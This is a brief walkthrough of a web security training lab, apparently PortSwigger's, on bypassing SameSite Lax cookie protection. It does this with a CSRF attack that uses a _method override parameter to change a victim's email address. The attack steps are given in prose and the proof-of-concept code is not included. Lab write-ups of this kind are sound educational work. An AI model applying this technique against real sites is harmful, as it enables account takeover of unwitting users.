LAB 7 - SameSite Lax bypass via method override

Initial instructions

This lab's change email function is vulnerable to CSRF. To solve the lab, perform a CSRF attack that changes the victim's email address. You should use the provided exploit server to host your attack.

You can log in to your own account using the following credentials: wiener:peter

First of all lets login with wiener credentials and lets try update its email and intercept this request with Burpsuite.

In this request we can see that there's no longer CSRF value.

Now I tried to change the request method and I tried to overate the method by adding the _method parameter to the query string.

If I send the request it allowed me.

So I will generate a CSRF PoC. And send it to the victim.

This is my CSRF PoC.

And I send it to the victim. (Remember change the email.)

Congratulations, you solved the lab!